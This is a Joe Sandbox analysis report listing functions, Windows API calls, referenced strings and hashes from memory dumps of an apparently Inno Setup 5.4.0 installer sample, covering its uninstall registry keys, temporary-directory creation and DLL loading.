Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: ErrorFileFindFirstLast
String ID:
API String ID: 873889042-0
Opcode ID: 53d0b0f71413149149492da54f6d795d092e0f5f146a7a05654b1b551a70fbd2
Instruction ID: f9611aeb3029889b76a7ade8829495a9d918b249c8fbd3e45bbd36cd3e6629b4
Opcode Fuzzy Hash: 53d0b0f71413149149492da54f6d795d092e0f5f146a7a05654b1b551a70fbd2
Instruction Fuzzy Hash: 1DF04931A04604AB8B10DB6AAD0149FB7FCDB46725710467BFC14E3282EA784E088598

Function 0046D118 Relevance: 3.0, APIs: 2, Instructions: 28comCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(?,0046D1AE), ref: 0046D122
CoCreateInstance.OLE32(00498B64,00000000,00000001,00498B74,?,?,0046D1AE), ref: 0046D13E

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: CreateInstanceVersion
String ID:
API String ID: 1462612201-0
Opcode ID: 7e99c10d7870a2a4e40b689fd77bd4c1fbc398cb1ecae8ca6f7261d0d29e43fa
Instruction ID: 1e059e1ff20256b2d38cad76cdb56475a0db9ba99d2cbde6061077ac095a0934
Opcode Fuzzy Hash: 7e99c10d7870a2a4e40b689fd77bd4c1fbc398cb1ecae8ca6f7261d0d29e43fa
Instruction Fuzzy Hash: 56F0A7B0B40301DEEB10AB2ADD46B8B37C19713324F04413BB054962A0E7ED8880CB9F

Function 00408570 Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049A4C0,00000001,?,0040863B,?,00000000,0040871A), ref: 0040858E

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: d9147d9d411e4ddcfbb477174297996358b0f3244354f1dc1cbfcde03a7bd03f
Instruction ID: d3b8e551ebd18b966166ca098383beb9494d3946d3c482517005b7019d2e894c
Opcode Fuzzy Hash: d9147d9d411e4ddcfbb477174297996358b0f3244354f1dc1cbfcde03a7bd03f
Instruction Fuzzy Hash: EEE0D87170021467D711A95A9C869F7B35CA758314F00427FB949EB3C2EDB8DE8046ED

Function 00423B94 Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_A.USER32(?,?,?,?,?,00424161,?,00000000,0042416C), ref: 00423BBE

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: NtdllProc_Window
String ID:
API String ID: 4255912815-0
Opcode ID: b8a7fb1636f510e04679fc1c95d6034bf50f85873c956373ae04f9643015f65e
Instruction ID: 62037174fb3a4e63d39f4d80a9d1e591ad15120c94b51c82d4663250cb3dbf53
Opcode Fuzzy Hash: b8a7fb1636f510e04679fc1c95d6034bf50f85873c956373ae04f9643015f65e
Instruction Fuzzy Hash: A0F0C579205608AFCB40DF9DC588D4AFBE8FB4C260B158295B988CB321C234FE808F94

Function 00454AB8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetUserNameA.ADVAPI32(?), ref: 00454ACE

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: b308eefd78fc34ccedab6b1389f53df2d3f8bc27a278cf7cb0c73ee59b873f37
Instruction ID: 76809c6cbed83fd478a986dc42ef3113a42af1b7be0c57f55a4460954ad8dcd3
Opcode Fuzzy Hash: b308eefd78fc34ccedab6b1389f53df2d3f8bc27a278cf7cb0c73ee59b873f37
Instruction Fuzzy Hash: 54D0CD7534430063C7006AA99C82597358C4784305F00443F7CC5DA2C3E5BDDA88565A

Function 0042F394 Relevance: 1.5, APIs: 1, Instructions: 17nativeCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042F3B0

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: NtdllProc_Window
String ID:
API String ID: 4255912815-0
Opcode ID: 463407ea8ab64360e41f6c039c0e682b96e3ddf2f94f44b918dd9fba9020941f
Instruction ID: f6c568c4939315a2eda578795105166964a56c952c5b5facb2271ccc97efa3bd
Opcode Fuzzy Hash: 463407ea8ab64360e41f6c039c0e682b96e3ddf2f94f44b918dd9fba9020941f
Instruction Fuzzy Hash: B8D05E7221010D6B8B00DE99D840C6F33AC9B88700BA08825F948C7205C634EC108BA4

Function 0046E080 Relevance: 72.2, APIs: 1, Strings: 40, Instructions: 480
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0046DE6C: RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,?,00474FCB,0049B178,?,0046E183,?,00000000,0046E6DA,?,_is1), ref: 0046DE8F

RegCloseKey.ADVAPI32(?,0046E6E1,?,_is1,?,Software\Microsoft\Windows\CurrentVersion\Uninstall\,00000000,0046E72C,?,?,0049B178,00000000), ref: 0046E6D4

Strings

ModifyPath, xrefs: 0046E51E
Inno Setup: No Icons, xrefs: 0046E1F3
Inno Setup: Setup Type, xrefs: 0046E231
EstimatedSize, xrefs: 0046E651
Inno Setup: Deselected Components, xrefs: 0046E26F
Software\Microsoft\Windows\CurrentVersion\Uninstall\, xrefs: 0046E0D6
Inno Setup: App Path, xrefs: 0046E1A6
Inno Setup: User Info: Name, xrefs: 0046E2CE
Inno Setup: Selected Tasks, xrefs: 0046E297
Inno Setup: Selected Components, xrefs: 0046E250
InstallLocation, xrefs: 0046E1C6
HelpLink, xrefs: 0046E48A
URLUpdateInfo, xrefs: 0046E4A7
URLInfoAbout, xrefs: 0046E450
Inno Setup: User Info: Organization, xrefs: 0046E2E3
Publisher, xrefs: 0046E433
HelpTelephone, xrefs: 0046E46D
Inno Setup: Icon Group, xrefs: 0046E1D5
DisplayName, xrefs: 0046E368
_is1, xrefs: 0046E0DC
MajorVersion, xrefs: 0046E591
NoModify, xrefs: 0046E532
5.4.0 (a), xrefs: 0046E176
" /SILENT, xrefs: 0046E3EC
NoRepair, xrefs: 0046E546
UninstallString, xrefs: 0046E3BF
Inno Setup: User Info: Serial, xrefs: 0046E2F8
QuietUninstallString, xrefs: 0046E3F9
Inno Setup: Deselected Tasks, xrefs: 0046E2B6
DisplayIcon, xrefs: 0046E385
Readme, xrefs: 0046E4C4
RegisterPreviousData, xrefs: 0046E68A
Inno Setup: Setup Version, xrefs: 0046E171
Contact, xrefs: 0046E4E1
Inno Setup: User, xrefs: 0046E212
Inno Setup: Language, xrefs: 0046E31F
DisplayVersion, xrefs: 0046E416
MinorVersion, xrefs: 0046E5A3
InstallDate, xrefs: 0046E565
Comments, xrefs: 0046E4FE

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: CloseValue
String ID: " /SILENT$5.4.0 (a)$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$EstimatedSize$HelpLink$HelpTelephone$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: Language$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: Setup Version$Inno Setup: User$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$InstallDate$InstallLocation$MajorVersion$MinorVersion$ModifyPath$NoModify$NoRepair$Publisher$QuietUninstallString$Readme$RegisterPreviousData$Software\Microsoft\Windows\CurrentVersion\Uninstall\$URLInfoAbout$URLUpdateInfo$UninstallString$_is1
API String ID: 3132538880-1122008755
Opcode ID: 8e42fddb56d3329dbef7a6a297206f9074c7af5ead7140c5731b4336ecc3ba8d
Instruction ID: d6e88d1f6cb7b2cefc9fba2fbd39931f8be9331f85677ee55fb68547bd3bf3cf
Opcode Fuzzy Hash: 8e42fddb56d3329dbef7a6a297206f9074c7af5ead7140c5731b4336ecc3ba8d
Instruction Fuzzy Hash: C3123034F001089BCB04EB56E981ADE77F5EF58304F60807BE8116B3A5EB79AD45CB5A

Function 00490C98 Relevance: 56.4, APIs: 16, Strings: 16, Instructions: 431
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000,00000000,0049118D,?,?,?,?,00000000,00000000,00000000), ref: 00490CD8
FindWindowA.USER32(00000000,00000000), ref: 00490D09

Strings

CHARTOOEMBUFF, xrefs: 0049112E
POSTMESSAGE, xrefs: 00490DB3
SENDBROADCASTNOTIFYMESSAGE, xrefs: 00490F47
FINDWINDOWBYCLASSNAME, xrefs: 00490CE5
CREATEMUTEX, xrefs: 004910B9
SLEEP, xrefs: 00490CC2
REGISTERWINDOWMESSAGE, xrefs: 00490E6B
SENDNOTIFYMESSAGE, xrefs: 00490E0F
FREEDLL, xrefs: 00491084
CALLDLLPROC, xrefs: 00490FFD
POSTBROADCASTMESSAGE, xrefs: 00490EF3
SENDBROADCASTMESSAGE, xrefs: 00490EA5
SENDMESSAGE, xrefs: 00490D5D
LOADDLL, xrefs: 00490F9B
OEMTOCHARBUFF, xrefs: 004910EB
FINDWINDOWBYWINDOWNAME, xrefs: 00490D21

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: FindSleepWindow
String ID: CALLDLLPROC$CHARTOOEMBUFF$CREATEMUTEX$FINDWINDOWBYCLASSNAME$FINDWINDOWBYWINDOWNAME$FREEDLL$LOADDLL$OEMTOCHARBUFF$POSTBROADCASTMESSAGE$POSTMESSAGE$REGISTERWINDOWMESSAGE$SENDBROADCASTMESSAGE$SENDBROADCASTNOTIFYMESSAGE$SENDMESSAGE$SENDNOTIFYMESSAGE$SLEEP
API String ID: 3078808852-3310373309
Opcode ID: 4688106ba75806e635d0f748856e326098f1ac44329b3e50716d9597bb099cff
Instruction ID: 3689c34fe079b887eecbe3c8abd258a9be24a9666ebde3bfb919725182042c62
Opcode Fuzzy Hash: 4688106ba75806e635d0f748856e326098f1ac44329b3e50716d9597bb099cff
Instruction Fuzzy Hash: 8EC19C60B002026BDB14BB3E8C8291E599A9FC9708B11D93FF546EB79ACD3DDD06435E

Function 00481DF0 Relevance: 26.3, APIs: 9, Strings: 6, Instructions: 68
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00481E01
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00481E0E
GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00481E1C
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00481E24
GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00481E30
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00481E51
GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00481E64
GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 00481E6A
GetSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00481E81

Strings

kernel32.dll, xrefs: 00481DFC
IsWow64Process, xrefs: 00481E1E
RegDeleteKeyExA, xrefs: 00481E5A
GetNativeSystemInfo, xrefs: 00481E08
GetSystemWow64DirectoryA, xrefs: 00481E4B
advapi32.dll, xrefs: 00481E5F

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: AddressProc$HandleInfoModuleSystem$CurrentNativeProcess
String ID: GetNativeSystemInfo$GetSystemWow64DirectoryA$IsWow64Process$RegDeleteKeyExA$advapi32.dll$kernel32.dll
API String ID: 2230631259-2623177817
Opcode ID: ee5804469110e506db367347f51c824ce5616b51277ad345f7f2ea83579cd2a3
Instruction ID: 139b281cd70ff203116dc437a84a2e67e00dfa051846aebc7d59a7e7d95df608
Opcode Fuzzy Hash: ee5804469110e506db367347f51c824ce5616b51277ad345f7f2ea83579cd2a3
Instruction Fuzzy Hash: B1110D41504341D4DB2077BA6C45B7F2A8C8B11319F080C3B6C50662F3CA7C8887DBAF

Function 00472708 Relevance: 25.1, APIs: 9, Strings: 5, Instructions: 585
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegDeleteValueA.ADVAPI32(?,00000000,?,00000002,00000000,00000000,00472D01,?,?,?,?,00000000,00472E5B,?,?,0049B178), ref: 00472890
RegCloseKey.ADVAPI32(?,?,00000000,?,00000002,00000000,00000000,00472D01,?,?,?,?,00000000,00472E5B,?,?), ref: 00472899

Part of subcall function 0047255C: GetLastError.KERNEL32(00000000,00000000,00000000,00472630,?,?,0049B178,00000000), ref: 004725E9

RegDeleteValueA.ADVAPI32(?,00000000,00000000,00472CF0,?,?,00000000,00472D01,?,?,?,?,00000000,00472E5B,?,?), ref: 004729B7

Part of subcall function 0042DD0C: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DD38

Part of subcall function 0047255C: GetLastError.KERNEL32(00000000,00000000,00000000,00472630,?,?,0049B178,00000000), ref: 004725FF

Strings

olddata, xrefs: 00472ABA, 00472B19
Cannot access 64-bit registry keys on this version of Windows, xrefs: 004727E6
break, xrefs: 00472B27
Failed to parse "qword" value, xrefs: 00472C43
{olddata}, xrefs: 00472A4F, 00472AE6

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: DeleteErrorLastValue$CloseCreate
String ID: Cannot access 64-bit registry keys on this version of Windows$Failed to parse "qword" value$break$olddata${olddata}
API String ID: 2638610037-3092547568
Opcode ID: 60c61eb47bec3a2eac8f774f64e080f7387afc8de715dc427226ed339478b351
Instruction ID: 0e42c6b5a9d89693cebc7f702fd10ac1157821fa568552e70b891395feb5272a
Opcode Fuzzy Hash: 60c61eb47bec3a2eac8f774f64e080f7387afc8de715dc427226ed339478b351
Instruction Fuzzy Hash: BE320D74E00248AFDB15DFA9D581BDEB7F4AF08304F448066F914AB3A2CB78AD45CB59

Function 004684C8 Relevance: 24.7, APIs: 1, Strings: 13, Instructions: 155
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60

RegCloseKey.ADVAPI32(?,004686E2,?,?,00000001,00000000,00000000,004686FD,?,00000000,00000000,?), ref: 004686CB

Strings

Inno Setup: User Info: Organization, xrefs: 0046869A
Inno Setup: Deselected Tasks, xrefs: 00468659
Inno Setup: User Info: Name, xrefs: 00468687
Inno Setup: Icon Group, xrefs: 004685A6
Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00468527
Inno Setup: User Info: Serial, xrefs: 004686AD
Inno Setup: Deselected Components, xrefs: 0046860C
Inno Setup: App Path, xrefs: 0046858A
Inno Setup: Setup Type, xrefs: 004685DA
Inno Setup: Selected Tasks, xrefs: 00468637
%s\%s_is1, xrefs: 00468545
Inno Setup: No Icons, xrefs: 004685B3
Inno Setup: Selected Components, xrefs: 004685EA

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: CloseOpen
String ID: %s\%s_is1$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$Software\Microsoft\Windows\CurrentVersion\Uninstall
API String ID: 47109696-1093091907
Opcode ID: bf4e5bcefe0dd369e5494d4ffd3574234bc3bf336502117424754692d6e87e56
Instruction ID: 9e5fcdcadd17e924e807c4804dd8b09e3b38f40da8ec3e6eb3bcc5aac06a0e07
Opcode Fuzzy Hash: bf4e5bcefe0dd369e5494d4ffd3574234bc3bf336502117424754692d6e87e56
Instruction Fuzzy Hash: 7751B570A002089BDB11DB65D9416DEB7F5EF49304FA086BEE840A7391EF78AE05CB5D

Function 0047B8DC Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 95
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(73AF0000,SHGetFolderPathA), ref: 0047B9DE

Strings

Failed to get address of SHGetFolderPath function, xrefs: 0047B9EF
Failed to load DLL "%s", xrefs: 0047B9C1
_isetup\_shfoldr.dll, xrefs: 0047B90E
shfolder.dll, xrefs: 0047B941, 0047B97A
j]I, xrefs: 0047B925, 0047B96A, 0047B952, 0047B95A
SHFOLDERDLL, xrefs: 0047B91B
Failed to get version numbers of _shfoldr.dll, xrefs: 0047B934
shell32.dll, xrefs: 0047B989
SHGetFolderPathA, xrefs: 0047B9D3

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: AddressProc
String ID: Failed to get address of SHGetFolderPath function$Failed to get version numbers of _shfoldr.dll$Failed to load DLL "%s"$SHFOLDERDLL$SHGetFolderPathA$_isetup\_shfoldr.dll$j]I$shell32.dll$shfolder.dll
API String ID: 190572456-2632518235
Opcode ID: 19c183ce3fa01bcadeab013b8c160553b935e57be8875c604a0db8c8468d0ef5
Instruction ID: 54e288ff13d65e77707e80ace3ca021a5634fe8f765e4003a0d502320fe0c017
Opcode Fuzzy Hash: 19c183ce3fa01bcadeab013b8c160553b935e57be8875c604a0db8c8468d0ef5
Instruction Fuzzy Hash: 62311DB0A00249DFCB10EB95D982AEEB7B4EF44308F50847BE554E7352D7389E458BAD

Function 0047B5B0 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 108
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryA.KERNEL32(00000000,00000000,00000000,0047B723,?,?,00000000,0049A628,00000000,00000000,?,004969FD,00000000,00496BA6,?,00000000), ref: 0047B643
GetLastError.KERNEL32(00000000,00000000,00000000,0047B723,?,?,00000000,0049A628,00000000,00000000,?,004969FD,00000000,00496BA6,?,00000000), ref: 0047B64C

Strings

oI, xrefs: 0047B708, 0047B67A, 0047B684
oI, xrefs: 0047B657, 0047B664
\_setup64.tmp, xrefs: 0047B6DB
Created temporary directory: , xrefs: 0047B5E5
_isetup, xrefs: 0047B62E
REGDLL_EXE, xrefs: 0047B6C0
\_RegDLL.tmp, xrefs: 0047B6B0

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID: Created temporary directory: $REGDLL_EXE$\_RegDLL.tmp$\_setup64.tmp$_isetup$oI$oI
API String ID: 1375471231-857235331
Opcode ID: cbcd31ce72f07627676fb358a31cf6d42b3233dd890dda5219184df80f66688f
Instruction ID: c69cc1ab8f896661f98e1b5ecb406916ff938ef434e98a02422d0df200dcf9d8
Opcode Fuzzy Hash: cbcd31ce72f07627676fb358a31cf6d42b3233dd890dda5219184df80f66688f
Instruction Fuzzy Hash: 45415C34A002099FCB04EFA5D992ADEB7B5EF48309F50843BE51477392DB389E058B99

Function 00406334 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 27
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,00497084), ref: 0040633A
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00406347
GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 0040635D
GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 00406373
SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00497084), ref: 0040637E

Strings

SetDllDirectoryW, xrefs: 00406341
SetProcessDEPPolicy, xrefs: 0040636D
SetSearchPathMode, xrefs: 00406357
kernel32.dll, xrefs: 00406335

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: AddressProc$HandleModulePolicyProcess
String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
API String ID: 3256987805-3653653586
Opcode ID: 2d072691014e9b17485d1139902ec2132fd60bbe123d67ee511500e2736c37f1
Instruction ID: d0a9e1fb4642b92a4408cab99680119fc9d423cfedcded744397bec81fc197df
Opcode Fuzzy Hash: 2d072691014e9b17485d1139902ec2132fd60bbe123d67ee511500e2736c37f1
Instruction Fuzzy Hash: C6E026A1380701ACEA1436F20D82F7B10488B40B64B2A14373D5AB91C3D9BDD92459BD

Function 00423884 Relevance: 15.1, APIs: 10, Instructions: 98
